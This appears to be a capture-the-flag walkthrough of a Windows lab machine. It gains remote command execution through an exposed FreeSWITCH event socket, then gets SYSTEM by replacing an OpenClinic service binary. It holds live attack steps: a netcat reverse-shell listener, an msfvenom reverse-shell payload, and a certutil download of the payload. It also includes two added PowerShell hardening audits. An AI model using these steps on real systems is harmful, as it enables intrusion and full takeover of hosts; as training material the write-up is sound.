A quick nmap scan shows a couple of services running on the target machine:

$ nmap -vv -Pn -sV
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( ) at 2022-03-08 14:01 CET
NSE: Loaded 45 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:01, 1.03s elapsed
Initiating Connect Scan at 14:01
Scanning [1000 ports]
Discovered open port 3389/tcp on
Discovered open port 8021/tcp on
Completed Connect Scan at 14:01, 5.87s elapsed (1000 total ports)
Initiating Service scan at 14:01
Scanning 2 services on
Completed Service scan at 14:01, 8.02s elapsed (2 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Nmap scan report for
Host is up, received user-set (0.049s latency).
Scanned at 2022-03-08 14:01:45 CET for 14s
Not shown: 998 filtered tcp ports (no-response)
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds

FreeSWITCH mod_event_socket

I’ve never heard of FreeSWITCH mod_event_socket before, but a quick search using searchsploit reveals a promising RCE vulnerability.

$ searchsploit FreeSWITCH
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Ex | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Executio | windows/remote/47799.txt
------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

$ searchsploit -m 47799
  Exploit: FreeSWITCH 1.10.1 - Command Execution
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
File Type: Python script, ASCII text executable

Copied to: /home/hag/thm/flatline/47799.txt

Remote Code Execution

The 47799.txt file is actually a Python script. Using the script, we can run commands on the remote machine and get the command output back as well.

$ mv 47799.txt

$ python3 whoami
Content-Type: api/response
Content-Length: 25


🚩 Flag 1: user.txt

As we can see when running whoami, we are currently running commands as the win-eom4pk0578n\nekrotic user. We should be able to retrieve the user.txt flag at this point.

$ python3 "dir c:\users\Nekrotic\Desktop"
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of c:\users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,602,835,968 bytes free

$ python3 "type c:\users\Nekrotic\Desktop\user.txt"
Content-Type: api/response
Content-Length: 38


The root.txt flag is not accessible to this user, so we must elevate our privileges.
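The exploit above works because the FreeSWITCH event socket is reachable from the network and accepts its shipped credentials. The following PowerShell check is an added example, not part of the original writeup or of FreeSWITCH; it reads event_socket.conf.xml and the live listeners to report that exposure. The config path is an assumption based on the default install directory seen in the shell prompt above.

```powershell
# Added hardening check, not part of the original writeup. Reports whether a
# FreeSWITCH event socket (mod_event_socket, TCP 8021) is reachable from the
# network and still uses the shipped default password. The config path is an
# assumption based on a default Windows install under C:\Program Files\FreeSWITCH.
param(
    [string]$ConfPath = 'C:\Program Files\FreeSWITCH\conf\autoload_configs\event_socket.conf.xml'
)

$findings = @()
$params   = @{}

if (Test-Path -Path $ConfPath) {
    [xml]$conf = Get-Content -Path $ConfPath -Raw
    # <configuration><settings><param name="..." value="..."/> ... </settings></configuration>
    foreach ($p in $conf.configuration.settings.param) { $params[$p.name] = $p.value }

    if ($params['listen-ip'] -notin @('127.0.0.1', '::1')) {
        $findings += "listen-ip is '$($params['listen-ip'])': bind the event socket to loopback unless remote ESL clients are required."
    }
    if ($params['password'] -eq 'ClueCon') {
        $findings += 'password is still the FreeSWITCH default: set a unique value.'
    }
    if (-not $params.ContainsKey('apply-inbound-acl')) {
        $findings += 'no apply-inbound-acl set: restrict ESL clients with an ACL from acl.conf.xml.'
    }
} else {
    $findings += "event_socket.conf.xml not found at $ConfPath (pass -ConfPath)."
}

# Independent of the file: is the port actually listening on a non-loopback address?
$port = 8021
if ($params['listen-port']) { $port = [int]$params['listen-port'] }
$listeners = Get-NetTCPConnection -State Listen -LocalPort $port -ErrorAction SilentlyContinue
foreach ($l in $listeners) {
    if ($l.LocalAddress -in @('0.0.0.0', '::')) {
        $findings += "TCP $port is listening on $($l.LocalAddress) (all interfaces), PID $($l.OwningProcess)."
    }
}

if ($findings.Count -eq 0) {
    'OK: event socket is loopback-only with a non-default password.'
} else {
    $findings | ForEach-Object { "FINDING: $_" }
}
```

Run it on the FreeSWITCH host itself; on the target described here it would flag the listener on all interfaces, which is the condition nmap observed from the outside.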

Reverse Shell

Let’s try and get a reverse shell as the win-eom4pk0578n\nekrotic user first; that will make privilege escalation easier.

Reverse shell created using template PowerShell #3 (Base64).

Set up the listener

$ nc -lvnp 4242
listening on [any] 4242 ...

Run the RCE exploit with the reverse shell payload


We get a connection back to our attacker machine:

connect to [] from (UNKNOWN) [] 49797
PS C:\Program Files\FreeSWITCH>

Privilege Escalation

Looking around on the target, we found the directory C:\projects\openclinic, which looks interesting.

$ searchsploit openclinic
-------------------------------------------- ---------------------------------
 Exploit Title                              |  Path
-------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Es | windows/local/50448.txt
-------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Looks like we have an LPE vulnerability.

Create payload

PoC taken from windows/local/50448.txt:

$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9999 -f exe > rs.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Download payload to target

certutil.exe -urlcache -f rs.exe

Replacing mysqld.exe and restarting services

Stop the OpenClinicMySQL service so we can replace mysqld.exe with the reverse shell:

PS C:\projects\openclinic\mariadb\bin> net stop OpenClinicMySQL
The OpenClinicMySQL service is stopping.
The OpenClinicMySQL service was stopped successfully.

PS C:\projects\openclinic\mariadb\bin> rm mysqld.exe

PS C:\projects\openclinic\mariadb\bin> cp C:\projects\openclinic\rs.exe mysqld.exe

Start the new listener:

$ nc -lvnp 9999
listening on [any] 9999 ...

Restart the OpenClinicMySQL service to run our reverse shell on the target:

PS C:\projects\openclinic\mariadb\bin> net start OpenClinicMySQL
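The swap above only works because a non-privileged user can delete and replace the binary of a service that runs as SYSTEM. The following PowerShell audit is an added example, not part of the original writeup or of OpenClinic; it takes a service name (OpenClinicMySQL from the page by default) and reports every principal outside a trusted set that can tamper with the service binary or its folder. The trusted-principal list is an assumption to adjust per environment.

```powershell
# Added hardening check, not part of the original writeup. Given a Windows
# service name, reports any principal outside a trusted set that can write to,
# delete or replace the service binary or its folder: the weakness the
# OpenClinicMySQL binary swap relies on. Service name is from the page; the
# trusted-principal list is an assumption.
param([string]$ServiceName = 'OpenClinicMySQL')

$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
if (-not $svc) { throw "Service '$ServiceName' not found." }

# PathName may be quoted and may carry arguments; keep only the executable.
# (An unquoted path containing spaces is itself a finding worth a separate check.)
$exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' ')[0] }
$dir = Split-Path -Path $exe -Parent

$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')

# Access-mask bits that allow tampering with a file or its containing folder:
# WRITE_DATA, APPEND_DATA, WRITE_EA, DELETE_CHILD, WRITE_ATTRIBUTES, DELETE,
# WRITE_DAC, WRITE_OWNER, plus GENERIC_WRITE and GENERIC_ALL.
$tamperMask = 0x2 -bor 0x4 -bor 0x10 -bor 0x40 -bor 0x100 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

$findings = @()
foreach ($path in @($exe, $dir)) {
    $acl = Get-Acl -Path $path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        # Cast to int so generic rights (which have no enum name) are still compared.
        if (([int]$ace.FileSystemRights -band $tamperMask) -ne 0) {
            $findings += "$($ace.IdentityReference.Value) has $($ace.FileSystemRights) on $path"
        }
    }
}

"Service : $ServiceName (runs as $($svc.StartName))"
"Binary  : $exe"
if ($findings.Count -eq 0) {
    'OK: only trusted principals can modify the service binary or its folder.'
} else {
    $findings | ForEach-Object { "FINDING: $_" }
    'Fix: remove write/modify rights for non-admin principals on the binary and its folder (icacls), and review the service account.'
}
```

On the target described here this would list the interactive user's rights on C:\projects\openclinic\mariadb\bin, which is exactly what made the mysqld.exe replacement possible.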

Successful Privilege Escalation

We got a connection from the target. We are now nt authority\system and can read root.txt:

connect to [] from (UNKNOWN) [] 49861
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system


 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of c:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,430,775,296 bytes free

🚩 Flag 2: root.txt

c:\Users\Nekrotic\Desktop>type root.txt

type root.txt